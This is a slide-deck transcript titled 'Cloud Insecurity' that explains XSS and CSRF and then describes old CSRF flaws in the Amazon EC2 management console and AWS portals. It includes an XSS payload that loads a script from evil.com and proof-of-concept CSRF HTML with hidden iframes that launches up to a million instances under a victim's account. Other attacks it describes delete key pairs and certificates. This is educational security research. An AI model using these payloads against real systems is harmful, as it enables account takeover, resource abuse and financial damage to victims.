Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 

Cloud Insecurity

  • 2. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 3. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 4. Recalls • XSS (Cross-Site Scripting) vulnerability allows an attacker to use a website to transmit an attack (the website becomes the vector through which attackers reach their victims). • XSS is today’s most widely reported software vulnerability.
  • 5. Recalls • XSS, a simple example: <c:if test=“${param.sayHello}”> Server-Side JSP Hello ${param.name}! </c:if> Evil parameter: %3Cscript%20src%3D%22Dhttp%3A//evil.com/evil.js%22%3E%3C /script%3E Result: Hello <script src=“http://evil.com/evil.js”></script>
  • 6. Recalls • CSRF (Cross-Site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. • CSRF tricks the victim into loading a page that contains a malicious request.
  • 7. Recalls • CSRF, a simple example: ... <img src=“http://truste Trusted blog (i.e. MySpace) dblog.com/addfrien d.php?id=12345”/> ... Active session User Evil Site
  • 8. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 9. Attacks against EC2 • The Amazon EC2 cloud is managed via web services and web interface consoles. • The web management console asks the user to provide her Amazon.com username and password. • The login page is hosted on the Amazon.com domain, making it susceptible to web application vulnerabilities found anywhere on the domain.
  • 10. Attacks against EC2 • Once an attacker gains access to the EC2 user’s session, the Amazon web management console offers a wealth of information related to the victim’s EC2 instances (X.509 certificates, secret tokens, ...).
  • 11. Attacks against EC2 • If the attacker discovers an XSS vulnerability anywhere on the Amazon.com domain, he can use a simple JavaScript payload to steal the EC2 user’s Access Key ID and Secret Access Key.
  • 12. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 13. Amazon EC2 real vulnerabilities • The security of AMI instances depends on the web management console for security. • Several portions of Amazon’s web management console were vulnerable to cross-site request forgery (CSRF) attacks.
  • 14. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 15. Web management console vulnerabilities • The first allows the attacker to start an arbitrary AMI instance using the victim’s EC2 account. • Two parts: – Initialize an evil AMI; – Launch the instance under the victim’s EC2 account.
  • 16. Web management console vulnerabilities initialize.html: <html> <body> <img src="https://console.aws.amazon.com/ec2/_launchWizar dForm.jsp? action.ImageId=ami-00031337&architecture=i386& image_icon=%2Fimages%2Flogo_windows.gif& image_title=Basic%20Microsoft%20Windows%20Server%202 003& selected_language=undefined&groupName=Webserver&keyN ame=undefined"> </body> </html>
  • 17. Web management console vulnerabilities initialize.html: Cross-Domain <html> Image Tag <body> <img src="https://console.aws.amazon.com/ec2/_launchWizar dForm.jsp? action.ImageId=ami-00031337&architecture=i386& image_icon=%2Fimages%2Flogo_windows.gif& image_title=Basic%20Microsoft%20Windows%20Server%202 003& selected_language=undefined&groupName=Webserver&keyN ame=undefined"> </body> </html>
  • 18. Web management console vulnerabilities launch.html: <html> <body> <form action="https://console.aws.amazon.com/ec2/runInstancesJson?" id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST"> <input type="hidden" name="action.MinCount" value="1" /> <input type="hidden" name="action.InstanceType" value="m1.small" /> <input type="hidden" name="action.SecurityGroup" value="default" /> <input type="hidden" name="action.SecurityGroup" value="Webserver" /> <input type="hidden" name="action.MaxCount" value="1000000" /> <input type="hidden" name="action.ImageId" value="ami-00031337" /> <input type="hidden" name="mbtc" value="50084" /> <input type="hidden" name="region" value="us-east-1" /> </form> <script> setTimeout("document.LaunchEvilAMI.submit()",5000); </script> </body> </html>
  • 19. Web management console vulnerabilities
  • 20. Web management console vulnerabilities Merge: <html> <body> <iframe src="./initialize.html" height="0" width="0"></iframe> <iframe src="./launch.html" height="0" width="0"></iframe> </body> </html>
  • 21. Web management console vulnerabilities Merge: The browser will not display the reply of <html> the web server. <body> <iframe src="./initialize.html" height="0" width="0"></iframe> <iframe src="./launch.html" height="0" width="0"></iframe> </body> </html>
  • 22. Web management console vulnerabilities • The second vulnerability terminates arbitrary AMIs being run by the victim. • After the attack is launched, the victim can see that the instance was terminated without her consent.
  • 23. Web management console vulnerabilities • The last vulnerability involves the deletion of AMI key pairs. • Using a CSRF vulnerability, an attacker has the ability to delete arbitrary key pairs from a victim’s EC2 session. If the key pair is deleted, and the user has not properly backed up the key pair, he will have lost access to his own AMIs!
  • 24. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 25. AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are : – a username/password combination; – an Access Key ID/Secret Access Key combination; – and X.509 certificates
  • 26. AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are : – a username/password combination; – an Access Key ID/Secret Access Key combination; – and X.509 certificates.
  • 27. AWS portals vulnerabilities • The first attack against AWS generates a new access key for the EC2 user’s session. • Access keys are used to authenticate a user to AWS, which is used to administer and manage the various AMIs running in a user’s account. • The attacker can create a temporary denial of service as the administrator must now update all the applications utilizing access key authentication to use the newly generated key.
  • 28. AWS portals vulnerabilities • This next attack forcibly deletes any X.509 certificates previously generated by the EC2 user. • Once the X.509 certificates are deleted, any application that relied on X.509 certificate authentication must be redeployed with the newly generated certificates.
  • 29. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 30. Conclusions • Cloud Computing allows organizations to focus on their core business while ensuring that their IT infrastructures are flexible enough to meet the demands of current and future users. • But it does not magically protect application logic from abuse or prevent attacks against the application level.
  • 31. Conclusions • Uploading the most hardened virtual machine will not prevent attacks against the web-based management consoles that are used to administer the virtual machines. • Cloud providers must fix their security bugs and perform an incessant code review.
  • 32. References • Hacking: the Next Generation Nitesh Dhanjani, Billy Rios, and Brett Hardin. O’Reilly, 2009. • Hacking Exposed: Web 2.0 Rich Cannings, Himanshu Dwivedi, Zane Lackey. Mc-Graw Hill, 2008 • Secure Programming with Static Analysis Brian Chess, Jacob West. Addison-Wesley, 2007.